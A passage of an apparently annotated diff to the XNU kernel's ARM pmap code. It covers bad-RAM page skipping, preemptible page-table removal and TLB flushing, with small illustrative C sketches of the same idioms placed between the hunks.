 #if __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX)
        [PMAP_DISABLE_USER_JOP_INDEX] = pmap_disable_user_jop_internal,
 #endif /* __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) */
+
+#if DEVELOPMENT || DEBUG
+       [PMAP_TEST_TEXT_CORRUPTION_INDEX] = pmap_test_text_corruption_internal,
+#endif /* DEVELOPMENT || DEBUG */
 };
 #endif
 
@@ -2528,6 +2555,64 @@ pmap_get_cpu_data(void)
        return pmap_cpu_data;
 }
 
+#if __arm64__
+/*
+ * Disable interrupts and return previous state.
+ *
+ * The PPL has its own interrupt state facility, separate from
+ * ml_set_interrupts_enabled(), since that function is not part of
+ * the PPL and so may do things like manipulate untrusted data and
+ * take ASTs.
+ *
+ * @return The previous interrupt state, to be restored with
+ *         pmap_interrupts_restore().
+ */
+static uint64_t __attribute__((warn_unused_result)) __used
+pmap_interrupts_disable(void)
+{
+       uint64_t state = __builtin_arm_rsr64("DAIF");
+
+       if ((state & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE) {
+               __builtin_arm_wsr64("DAIFSet", DAIFSC_STANDARD_DISABLE);
+       }
+
+       return state;
+}
+
+/*
+ * Restore previous interrupt state.
+ *
+ * @param state The previous interrupt state to restore.
+ */
+static void __used
+pmap_interrupts_restore(uint64_t state)
+{
+       // no unknown bits?
+       assert((state & ~DAIF_ALL) == 0);
+
+       if (state != DAIF_STANDARD_DISABLE) {
+               __builtin_arm_wsr64("DAIF", state);
+       }
+}
+
+/*
+ * Query interrupt state.
+ *
+ * ml_get_interrupts_enabled() is safe enough at the time of writing
+ * this comment, but because it is not considered part of the PPL it
+ * could change without notice, and because it presently only checks
+ * DAIF_IRQ, we have our own version.
+ *
+ * @return true if interrupts are enabled (not fully disabled).
+ */
+
+static bool __attribute__((warn_unused_result)) __used
+pmap_interrupts_enabled(void)
+{
+       return (__builtin_arm_rsr64("DAIF") & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE;
+}
+#endif /* __arm64__ */
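
As an aside, the save/disable/restore contract these three helpers implement can be sketched in plain C with a mock status word standing in for the DAIF register; the mask names and mock register below are invented, and the MRS/WSR intrinsics above are the real mechanism.

/* Illustrative sketch only: mock of the save/disable/restore idiom, not PPL code. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

#define MOCK_MASK_ALL      0xfull   /* all maskable sources (invented) */
#define MOCK_MASK_STANDARD 0x7ull   /* subset a "standard disable" would cover (invented) */

static uint64_t mock_status;        /* stands in for the DAIF register */

static uint64_t
mock_interrupts_disable(void)
{
        uint64_t state = mock_status;
        if ((state & MOCK_MASK_STANDARD) != MOCK_MASK_STANDARD) {
                mock_status |= MOCK_MASK_STANDARD;
        }
        return state;
}

static void
mock_interrupts_restore(uint64_t state)
{
        assert((state & ~MOCK_MASK_ALL) == 0);  /* no unknown bits */
        mock_status = state;
}

int
main(void)
{
        uint64_t saved = mock_interrupts_disable();
        /* ... critical section ... */
        mock_interrupts_restore(saved);
        printf("restored state 0x%llx\n", (unsigned long long)mock_status);
        return 0;
}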
+
 #if XNU_MONITOR
 /*
  * pmap_set_range_xprr_perm takes a range (specified using start and end) that
@@ -2786,14 +2871,12 @@ pmap_pages_reclaim(
                        pmap_simple_unlock(&pt_pages_lock);
                        return (pmap_paddr_t)0;
                } else {
-                       int                     remove_count = 0;
                        bool                    need_strong_sync = false;
                        vm_map_address_t        va;
                        pmap_t                  pmap;
                        pt_entry_t              *bpte, *epte;
                        pt_entry_t              *pte_p;
                        tt_entry_t              *tte_p;
-                       uint32_t                rmv_spte = 0;
 
                        pmap_simple_unlock(&pt_pages_lock);
                        pmap = ptdp->pmap;
@@ -2828,25 +2911,19 @@ pmap_pages_reclaim(
                                         * which could cause the counter to drift
                                         * more and more.
                                         */
-                                       remove_count += pmap_remove_range_options(
-                                               pmap, va, bpte, epte,
-                                               &rmv_spte, &need_strong_sync, PMAP_OPTIONS_REMOVE);
+                                       pmap_remove_range_options(
+                                               pmap, va, bpte, epte, NULL,
+                                               &need_strong_sync, PMAP_OPTIONS_REMOVE);
                                        if (ptd_get_info(ptdp, pte_p)->refcnt != 0) {
                                                panic("%s: ptdp %p, count %d", __FUNCTION__, ptdp, ptd_get_info(ptdp, pte_p)->refcnt);
                                        }
 
-                                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
-
-                                       if (remove_count > 0) {
-                                               pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, (size_t)pt_attr_leaf_table_size(pt_attr), pmap);
-                                       } else {
-                                               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(va, pmap);
-                                       }
+                                       pmap_tte_deallocate(pmap, va, va + (size_t)pt_attr_leaf_table_size(pt_attr), need_strong_sync,
+                                           tte_p, pt_attr_twig_level(pt_attr));
                                }
                        }
                        // Undo the lock we grabbed when we found ptdp above
                        pmap_unlock(pmap);
-                       pmap_sync_tlb(need_strong_sync);
                }
                pmap_simple_lock(&pmap_pages_lock);
        }
@@ -3259,21 +3336,22 @@ pmap_pages_free(
        pmap_paddr_t    pa,
        unsigned        size)
 {
-       pmap_simple_lock(&pmap_pages_lock);
-
-       if (pmap_pages_request_count != 0) {
+       if (__improbable(pmap_pages_request_count != 0)) {
                page_free_entry_t       *page_entry;
 
-               pmap_pages_request_count--;
-               page_entry = (page_free_entry_t *)phystokv(pa);
-               page_entry->next = pmap_pages_reclaim_list;
-               pmap_pages_reclaim_list = page_entry;
-               pmap_simple_unlock(&pmap_pages_lock);
+               pmap_simple_lock(&pmap_pages_lock);
 
-               return;
-       }
+               if (pmap_pages_request_count != 0) {
+                       pmap_pages_request_count--;
+                       page_entry = (page_free_entry_t *)phystokv(pa);
+                       page_entry->next = pmap_pages_reclaim_list;
+                       pmap_pages_reclaim_list = page_entry;
+                       pmap_simple_unlock(&pmap_pages_lock);
+                       return;
+               }
 
-       pmap_simple_unlock(&pmap_pages_lock);
+               pmap_simple_unlock(&pmap_pages_lock);
+       }
 
 #if XNU_MONITOR
        (void)size;
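
The reworked pmap_pages_free() now peeks at pmap_pages_request_count without the lock and only takes pmap_pages_lock (and re-checks) when the count appears nonzero. A minimal sketch of that check-then-lock-then-recheck pattern, assuming a pthread mutex and invented names:

/* Illustrative sketch only: double-checked fast path around a reclaim counter. */
#include <pthread.h>
#include <stdbool.h>

static pthread_mutex_t reclaim_lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned reclaim_request_count;   /* how many pages a reclaimer is waiting for */

/* Returns true if the page was handed to a waiting reclaimer instead of being freed. */
static bool
give_page_to_reclaimer_if_needed(void *page)
{
        bool handed_off = false;

        if (reclaim_request_count != 0) {          /* unlocked fast-path check */
                pthread_mutex_lock(&reclaim_lock);
                if (reclaim_request_count != 0) {  /* re-check under the lock */
                        reclaim_request_count--;
                        /* ... queue `page` on the reclaim list ... */
                        (void)page;
                        handed_off = true;
                }
                pthread_mutex_unlock(&reclaim_lock);
        }
        return handed_off;
}

int
main(void)
{
        char page[4096];

        reclaim_request_count = 1;   /* pretend a reclaimer is waiting */
        return give_page_to_reclaimer_if_needed(page) ? 0 : 1;
}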
@@ -5045,10 +5123,178 @@ pmap_virtual_region(
        return ret;
 }
 
+/*
+ * Routines to track and allocate physical pages during early boot.
+ * On most systems, that memory runs from first_avail through to avail_end
+ * with no gaps.
+ *
+ * However, if the system supports ECC and bad_ram_pages_count > 0, we
+ * need to be careful and skip those pages.
+ */
+static unsigned int avail_page_count = 0;
+static bool need_ram_ranges_init = true;
+
+#if defined(__arm64__)
+pmap_paddr_t *bad_ram_pages = NULL;
+unsigned int bad_ram_pages_count = 0;
+
+/*
+ * We use this sub-range of bad_ram_pages for pmap_next_page()
+ */
+static pmap_paddr_t *skip_pages;
+static unsigned int skip_pages_count = 0;
+
+#define MAX_BAD_RAM_PAGE_COUNT 64
+static pmap_paddr_t bad_ram_pages_arr[MAX_BAD_RAM_PAGE_COUNT];
+
+/*
+ * XXX - temporary code to get the bad pages array from boot-args.
+ * expects a comma separated list of offsets from the start
+ * of physical memory to be considered bad.
+ *
+ * HERE JOE -- will eventually be replaced by data provided by iboot
+ */
+static void
+parse_bad_ram_pages_boot_arg(void)
+{
+       char buf[256] = {0};
+       char *s = buf;
+       char *end;
+       int count = 0;
+       pmap_paddr_t num;
+       extern uint64_t strtouq(const char *, char **, int);
+
+       if (!PE_parse_boot_arg_str("bad_ram_pages", buf, sizeof(buf))) {
+               goto done;
+       }
+
+       while (*s && count < MAX_BAD_RAM_PAGE_COUNT) {
+               num = (pmap_paddr_t)strtouq(s, &end, 0);
+               if (num == 0) {
+                       break;
+               }
+               num &= ~PAGE_MASK;
+
+               bad_ram_pages_arr[count++] = gDramBase + num;
+
+               if (*end != ',') {
+                       break;
+               }
+
+               s = end + 1;
+       }
+
+done:
+       bad_ram_pages = bad_ram_pages_arr;
+       bad_ram_pages_count = count;
+}
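
For the boot-arg format described above, a minimal userspace sketch of parsing a comma-separated list of byte offsets and aligning them down to page boundaries; it uses the C library's strtoull rather than the kernel's strtouq, and all names and constants are illustrative.

/* Illustrative sketch only: parse "off1,off2,..." into page-aligned offsets. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_BAD_PAGES 64
#define PAGE_MASK_4K  0xfffull      /* 4 KiB pages, assumed for this sketch */

static int
parse_bad_page_list(const char *arg, uint64_t out[MAX_BAD_PAGES])
{
        int count = 0;

        while (*arg != '\0' && count < MAX_BAD_PAGES) {
                char *end;
                uint64_t off = strtoull(arg, &end, 0);
                if (end == arg) {
                        break;                       /* not a number */
                }
                out[count++] = off & ~PAGE_MASK_4K;  /* align down to a page boundary */
                if (*end != ',') {
                        break;
                }
                arg = end + 1;
        }
        return count;
}

int
main(void)
{
        uint64_t pages[MAX_BAD_PAGES];
        int n = parse_bad_page_list("4096,81920,1048577", pages);

        for (int i = 0; i < n; i++) {
                printf("bad page offset: 0x%llx\n", (unsigned long long)pages[i]);
        }
        return 0;
}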
+
+/*
+ * Comparison routine for qsort of array of physical addresses.
+ */
+static int
+pmap_paddr_cmp(void *a, void *b)
+{
+       pmap_paddr_t *x = a;
+       pmap_paddr_t *y = b;
+       if (*x < *y) {
+               return -1;
+       }
+       return *x > *y;
+}
+#endif /* defined(__arm64__) */
+
+/*
+ * Look up ppn in the sorted bad_ram_pages array.
+ */
+bool
+pmap_is_bad_ram(__unused ppnum_t ppn)
+{
+#if defined(__arm64__)
+       pmap_paddr_t pa = ptoa(ppn);
+       int low = 0;
+       int high = bad_ram_pages_count - 1;
+       int mid;
+
+       while (low <= high) {
+               mid = (low + high) / 2;
+               if (bad_ram_pages[mid] < pa) {
+                       low = mid + 1;
+               } else if (bad_ram_pages[mid] > pa) {
+                       high = mid - 1;
+               } else {
+                       return true;
+               }
+       }
+#endif /* defined(__arm64__) */
+       return false;
+}
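
A standalone analogue of the lookup above: sort with a comparator shaped like pmap_paddr_cmp, then binary-search the sorted addresses. Array contents and names are illustrative only.

/* Illustrative sketch only: qsort comparator plus binary search over sorted addresses. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

static int
addr_cmp(const void *a, const void *b)
{
        const uint64_t *x = a, *y = b;
        if (*x < *y) {
                return -1;
        }
        return *x > *y;
}

static bool
is_bad_addr(const uint64_t *sorted, int count, uint64_t addr)
{
        int low = 0, high = count - 1;

        while (low <= high) {
                int mid = (low + high) / 2;
                if (sorted[mid] < addr) {
                        low = mid + 1;
                } else if (sorted[mid] > addr) {
                        high = mid - 1;
                } else {
                        return true;
                }
        }
        return false;
}

int
main(void)
{
        uint64_t bad[] = { 0x3000, 0x1000, 0x7000 };
        int n = (int)(sizeof(bad) / sizeof(bad[0]));

        qsort(bad, (size_t)n, sizeof(bad[0]), addr_cmp);
        printf("0x3000 bad? %d\n", is_bad_addr(bad, n, 0x3000));  /* 1 */
        printf("0x2000 bad? %d\n", is_bad_addr(bad, n, 0x2000));  /* 0 */
        return 0;
}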
+
+/*
+ * Initialize the count of available pages. If we have bad_ram_pages, then sort that list.
+ * No lock is needed here, as this code is called while kernel boot-up is single-threaded.
+ */
+static void
+initialize_ram_ranges(void)
+{
+       pmap_paddr_t first = first_avail;
+       pmap_paddr_t end = avail_end;
+
+       assert(first <= end);
+       assert(first == (first & ~PAGE_MASK));
+       assert(end == (end & ~PAGE_MASK));
+       avail_page_count = atop(end - first);
+
+#if defined(__arm64__)
+       /*
+        * XXX Temporary code for testing, until there is iboot support
+        *
+        * Parse a list of known bad pages from a boot-args.
+        */
+       parse_bad_ram_pages_boot_arg();
+
+       /*
+        * Sort and filter the bad pages list and adjust avail_page_count.
+        */
+       if (bad_ram_pages_count != 0) {
+               qsort(bad_ram_pages, bad_ram_pages_count, sizeof(*bad_ram_pages), (cmpfunc_t)pmap_paddr_cmp);
+               skip_pages = bad_ram_pages;
+               skip_pages_count = bad_ram_pages_count;
+
+               /* ignore any pages before first */
+               while (skip_pages_count > 0 && skip_pages[0] < first) {
+                       --skip_pages_count;
+                       ++skip_pages;
+               }
+
+               /* ignore any pages at or after end */
+               while (skip_pages_count > 0 && skip_pages[skip_pages_count - 1] >= end) {
+                       --skip_pages_count;
+               }
+
+               avail_page_count -= skip_pages_count;
+       }
+#endif /* defined(__arm64__) */
+       need_ram_ranges_init = false;
+}
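
initialize_ram_ranges() narrows the sorted bad-page list to the [first_avail, avail_end) window before subtracting its length from the available-page count. A small sketch of just that trimming step, with invented names and addresses:

/* Illustrative sketch only: trim a sorted skip list to a half-open address window. */
#include <stdint.h>
#include <stdio.h>

static const uint64_t *
trim_to_window(const uint64_t *sorted, unsigned count,
    uint64_t first, uint64_t end, unsigned *out_count)
{
        /* drop entries below the window */
        while (count > 0 && sorted[0] < first) {
                sorted++;
                count--;
        }
        /* drop entries at or beyond the window */
        while (count > 0 && sorted[count - 1] >= end) {
                count--;
        }
        *out_count = count;
        return sorted;
}

int
main(void)
{
        uint64_t bad[] = { 0x1000, 0x5000, 0x9000, 0xf000 };
        unsigned avail_pages = 16, skip_count = 0;
        const uint64_t *skip = trim_to_window(bad, 4, 0x4000, 0xa000, &skip_count);

        avail_pages -= skip_count;   /* pages the allocator must not hand out */
        printf("%u skip entries starting at 0x%llx, %u pages usable\n",
            skip_count, (unsigned long long)skip[0], avail_pages);
        return 0;
}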
+
 unsigned int
 pmap_free_pages(
        void)
 {
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
+       return avail_page_count;
+}
+
+unsigned int
+pmap_free_pages_span(
+       void)
+{
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
        return (unsigned int)atop(avail_end - first_avail);
 }
 
@@ -5066,14 +5312,39 @@ boolean_t
 pmap_next_page(
        ppnum_t *pnum)
 {
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
+
+#if defined(__arm64__)
+       /*
+        * Skip over any known bad pages.
+        */
+       while (skip_pages_count > 0 && first_avail == skip_pages[0]) {
+               first_avail += PAGE_SIZE;
+               ++skip_pages;
+               --skip_pages_count;
+       }
+#endif /* defined(__arm64__) */
+
        if (first_avail != avail_end) {
                *pnum = (ppnum_t)atop(first_avail);
                first_avail += PAGE_SIZE;
+               assert(avail_page_count > 0);
+               --avail_page_count;
                return TRUE;
        }
+       assert(avail_page_count == 0);
        return FALSE;
 }
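
pmap_next_page() above consumes the head of the skip list whenever the next sequential page matches it. A userspace analogue of that allocation loop, assuming a 4 KiB page size and invented names:

/* Illustrative sketch only: sequential page allocator that skips known-bad pages. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define SIM_PAGE_SIZE 0x1000ull

static uint64_t next_addr  = 0x4000;   /* first_avail analogue */
static uint64_t limit_addr = 0x9000;   /* avail_end analogue */

static const uint64_t *skip_list;      /* sorted, within [next_addr, limit_addr) */
static unsigned skip_count;

static bool
next_page(uint64_t *out)
{
        /* Skip over any known-bad pages at the front of the list. */
        while (skip_count > 0 && next_addr == skip_list[0]) {
                next_addr += SIM_PAGE_SIZE;
                skip_list++;
                skip_count--;
        }
        if (next_addr != limit_addr) {
                *out = next_addr;
                next_addr += SIM_PAGE_SIZE;
                return true;
        }
        return false;
}

int
main(void)
{
        static const uint64_t bad[] = { 0x5000, 0x6000 };
        uint64_t page;

        skip_list = bad;
        skip_count = 2;
        while (next_page(&page)) {
                printf("allocated page at 0x%llx\n", (unsigned long long)page);
        }
        return 0;   /* prints 0x4000, 0x7000, 0x8000 */
}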
 
+void
+pmap_retire_page(
+       __unused ppnum_t pnum)
+{
+       /* XXX Justin TBD - mark the page as unusable in pmap data structures */
+}
+
 
 /*
  *     Initialize the pmap module.
@@ -5670,7 +5941,7 @@ pmap_deallocate_all_leaf_tts(pmap_t pmap, tt_entry_t * first_ttep, unsigned leve
 
                /* Remove the TTE. */
                pmap_lock(pmap);
-               pmap_tte_deallocate(pmap, ttep, level);
+               pmap_tte_deallocate(pmap, 0, 0, false, ttep, level);
                pmap_unlock(pmap);
        }
 }
@@ -5742,7 +6013,7 @@ pmap_destroy_internal(
        for (i = 0; i < pmap->tte_index_max; i++) {
                ttep = &pmap->tte[i];
                if ((*ttep & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
-                       pmap_tte_deallocate(pmap, ttep, PMAP_TT_L1_LEVEL);
+                       pmap_tte_deallocate(pmap, 0, 0, false, ttep, PMAP_TT_L1_LEVEL);
                }
        }
        pmap_unlock(pmap);
@@ -6187,12 +6458,18 @@ pmap_tt_deallocate(
  *       must have a refcnt of zero before the TTE can be removed.
  *
  * @param pmap The pmap containing the page table whose TTE is being removed.
+ * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance.
+ * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance.
+ * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance.
  * @param ttep Pointer to the TTE that should be cleared out.
  * @param level The level of the page table that contains the TTE to be removed.
  */
 static void
 pmap_tte_remove(
        pmap_t pmap,
+       vm_offset_t va_start,
+       vm_offset_t va_end,
+       bool need_strong_sync,
        tt_entry_t *ttep,
        unsigned int level)
 {
@@ -6222,6 +6499,17 @@ pmap_tte_remove(
        *ttep = (tt_entry_t) 0;
        FLUSH_PTE_STRONG(ttep);
 #endif /* (__ARM_VMSA__ == 7) */
+       // If given a VA range, we're being asked to flush the TLB before the table in ttep is freed.
+       if (va_end > va_start) {
+#if (__ARM_VMSA__ == 7)
+               // Ensure intermediate translations are flushed for each 1MB block
+               flush_mmu_tlb_entry_async((va_start & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+#endif
+               PMAP_UPDATE_TLBS(pmap, va_start, va_end, need_strong_sync);
+       }
 }
 
 /**
@@ -6235,6 +6523,9 @@ pmap_tte_remove(
  *       must have a refcnt of PT_DESC_REFCOUNT in their page table descriptor.
  *
  * @param pmap The pmap that owns the page table to be deallocated.
+ * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance.
+ * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance.
+ * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance.
  * @param ttep Pointer to the `level` TTE to remove.
  * @param level The level of the table that contains an entry pointing to the
  *              table to be removed. The deallocated page table will be a
@@ -6244,6 +6535,9 @@ pmap_tte_remove(
 static void
 pmap_tte_deallocate(
        pmap_t pmap,
+       vm_offset_t va_start,
+       vm_offset_t va_end,
+       bool need_strong_sync,
        tt_entry_t *ttep,
        unsigned int level)
 {
@@ -6261,7 +6555,7 @@ pmap_tte_deallocate(
        }
 #endif /* MACH_ASSERT */
 
-       pmap_tte_remove(pmap, ttep, level);
+       pmap_tte_remove(pmap, va_start, va_end, need_strong_sync, ttep, level);
 
        if ((tte & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
                uint64_t pmap_page_size = pt_attr_page_size(pmap_get_pt_attr(pmap));
@@ -6301,19 +6595,17 @@ pmap_tte_deallocate(
  *     entirely within one pte-page.  This is NOT checked.
  *     Assumes that the pte-page exists.
  *
- *     Returns the number of PTE changed, and sets *rmv_cnt
- *     to the number of SPTE changed.
+ *     Returns the number of PTE changed
  */
 static int
 pmap_remove_range(
        pmap_t pmap,
        vm_map_address_t va,
        pt_entry_t *bpte,
-       pt_entry_t *epte,
-       uint32_t *rmv_cnt)
+       pt_entry_t *epte)
 {
        bool need_strong_sync = false;
-       int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, rmv_cnt,
+       int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, NULL,
            &need_strong_sync, PMAP_OPTIONS_REMOVE);
        if (num_changed > 0) {
                PMAP_UPDATE_TLBS(pmap, va,
@@ -6470,11 +6762,12 @@ pmap_remove_range_options(
        vm_map_address_t va,
        pt_entry_t *bpte,
        pt_entry_t *epte,
-       uint32_t *rmv_cnt,
+       vm_map_address_t *eva,
        bool *need_strong_sync __unused,
        int options)
 {
        pt_entry_t     *cpte;
+       size_t          npages = 0;
        int             num_removed, num_unwired;
        int             num_pte_changed;
        int             pai = 0;
@@ -6482,11 +6775,12 @@ pmap_remove_range_options(
        int             num_external, num_internal, num_reusable;
        int             num_alt_internal;
        uint64_t        num_compressed, num_alt_compressed;
+       int16_t         refcnt = 0;
 
        pmap_assert_locked_w(pmap);
 
        const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
-       uint64_t pmap_page_size = pt_attr_page_size(pt_attr);
+       uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr);
 
        if (__improbable((uintptr_t)epte > (((uintptr_t)bpte + pmap_page_size) & ~(pmap_page_size - 1)))) {
                panic("%s: PTE range [%p, %p) in pmap %p crosses page table boundary", __func__, bpte, epte, pmap);
@@ -6503,10 +6797,18 @@ pmap_remove_range_options(
        num_alt_compressed = 0;
 
        for (cpte = bpte; cpte < epte;
-           cpte += 1, va += pmap_page_size) {
+           cpte += PAGE_RATIO, va += pmap_page_size) {
                pt_entry_t      spte;
                boolean_t       managed = FALSE;
 
+               /*
+                * Check for pending preemption on every iteration: the PV list may be arbitrarily long,
+                * so we need to be as aggressive as possible in checking for preemption when we can.
+                */
+               if (__improbable((eva != NULL) && npages++ && pmap_pending_preemption())) {
+                       *eva = va;
+                       break;
+               }
                spte = *((volatile pt_entry_t*)cpte);
 
 #if CONFIG_PGTRACE
@@ -6539,9 +6841,7 @@ pmap_remove_range_options(
                                 * our "compressed" markers,
                                 * so let's update it here.
                                 */
-                               if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) {
-                                       panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte);
-                               }
+                               --refcnt;
                                spte = *((volatile pt_entry_t*)cpte);
                        }
                        /*
@@ -6603,12 +6903,7 @@ pmap_remove_range_options(
                    (pmap != kernel_pmap)) {
                        assertf(!ARM_PTE_IS_COMPRESSED(spte, cpte), "unexpected compressed pte %p (=0x%llx)", cpte, (uint64_t)spte);
                        assertf((spte & ARM_PTE_TYPE_VALID) == ARM_PTE_TYPE, "invalid pte %p (=0x%llx)", cpte, (uint64_t)spte);
-                       if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) {
-                               panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte);
-                       }
-                       if (rmv_cnt) {
-                               (*rmv_cnt)++;
-                       }
+                       --refcnt;
                }
 
                if (pte_is_wired(spte)) {
@@ -6636,9 +6931,12 @@ pmap_remove_range_options(
         *      Update the counts
         */
        OSAddAtomic(-num_removed, (SInt32 *) &pmap->stats.resident_count);
-       pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size * PAGE_RATIO);
+       pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size);
 
        if (pmap != kernel_pmap) {
+               if ((refcnt != 0) && (OSAddAtomic16(refcnt, (SInt16 *) &(ptep_get_info(bpte)->refcnt)) <= 0)) {
+                       panic("pmap_remove_range_options: over-release of ptdp %p for pte [%p, %p)", ptep_get_ptd(bpte), bpte, epte);
+               }
                /* update pmap stats... */
                OSAddAtomic(-num_unwired, (SInt32 *) &pmap->stats.wired_count);
                if (num_external) {
@@ -6675,17 +6973,17 @@ pmap_remove_range_options(
                            orig_compressed);
                }
                /* ... and ledgers */
-               pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
+               pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pmap_page_size);
                /* make needed adjustments to phys_footprint */
                pmap_ledger_debit(pmap, task_ledgers.phys_footprint,
                    ((num_internal -
                    num_alt_internal) +
                    (num_compressed -
-                   num_alt_compressed)) * pmap_page_size * PAGE_RATIO);
+                   num_alt_compressed)) * pmap_page_size);
        }
 
        /* flush the ptable entries we have written */
@@ -6713,20 +7011,19 @@ pmap_remove(
        pmap_remove_options(pmap, start, end, PMAP_OPTIONS_REMOVE);
 }
 
-MARK_AS_PMAP_TEXT static int
+MARK_AS_PMAP_TEXT static vm_map_address_t
 pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)
 {
-       int             remove_count = 0;
+       vm_map_address_t eva = end;
        pt_entry_t     *bpte, *epte;
        pt_entry_t     *pte_p;
        tt_entry_t     *tte_p;
-       uint32_t        rmv_spte = 0;
+       int             remove_count = 0;
        bool            need_strong_sync = false;
-       bool            flush_tte = false;
 
        if (__improbable(end < start)) {
                panic("%s: invalid address range %p, %p", __func__, (void*)start, (void*)end);
@@ -6749,13 +7046,12 @@ pmap_remove_options_internal(
                bpte = &pte_p[pte_index(pmap, pt_attr, start)];
                epte = bpte + ((end - start) >> pt_attr_leaf_shift(pt_attr));
 
-               remove_count += pmap_remove_range_options(pmap, start, bpte, epte,
-                   &rmv_spte, &need_strong_sync, options);
+               remove_count = pmap_remove_range_options(pmap, start, bpte, epte, &eva,
+                   &need_strong_sync, options);
 
-               if (rmv_spte && (ptep_get_info(pte_p)->refcnt == 0) &&
-                   (pmap != kernel_pmap) && (pmap->nested == FALSE)) {
-                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
-                       flush_tte = true;
+               if ((pmap != kernel_pmap) && (pmap->nested == FALSE) && (ptep_get_info(pte_p)->refcnt == 0)) {
+                       pmap_tte_deallocate(pmap, start, eva, need_strong_sync, tte_p, pt_attr_twig_level(pt_attr));
+                       remove_count = 0; // pmap_tte_deallocate has flushed the TLB for us
                }
        }
 
@@ -6763,12 +7059,9 @@ done:
        pmap_unlock(pmap);
 
        if (remove_count > 0) {
-               PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync);
-       } else if (flush_tte) {
-               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(start, pmap);
-               sync_tlb_flush();
+               PMAP_UPDATE_TLBS(pmap, start, eva, need_strong_sync);
        }
-       return remove_count;
+       return eva;
 }
 
 void
@@ -6778,7 +7071,6 @@ pmap_remove_options(
        vm_map_address_t end,
        int options)
 {
-       int             remove_count = 0;
        vm_map_address_t va;
 
        if (pmap == PMAP_NULL) {
@@ -6801,6 +7093,7 @@ pmap_remove_options(
                    pmap, (uint64_t)start, (uint64_t)end);
        }
 #endif
+       assert(get_preemption_level() == 0);
 
        /*
         *      Invalidate the translation buffer first
@@ -6815,14 +7108,12 @@ pmap_remove_options(
                }
 
 #if XNU_MONITOR
-               remove_count += pmap_remove_options_ppl(pmap, va, l, options);
+               va = pmap_remove_options_ppl(pmap, va, l, options);
 
                pmap_ledger_check_balance(pmap);
 #else
-               remove_count += pmap_remove_options_internal(pmap, va, l, options);
+               va = pmap_remove_options_internal(pmap, va, l, options);
 #endif
-
-               va = l;
        }
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__REMOVE) | DBG_FUNC_END);
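
With this change the removal path becomes resumable: the worker may stop early when preemption is pending and return the address it reached, and the caller loops until the whole range is covered. A sketch of that pattern with a fake preemption predicate; everything below is illustrative, not the pmap code.

/* Illustrative sketch only: a resumable range worker and its retry loop. */
#include <stdint.h>
#include <stdio.h>

#define SIM_PAGE 0x1000ull

/* Stand-in for pmap_pending_preemption(); here it fires every 4th page. */
static int
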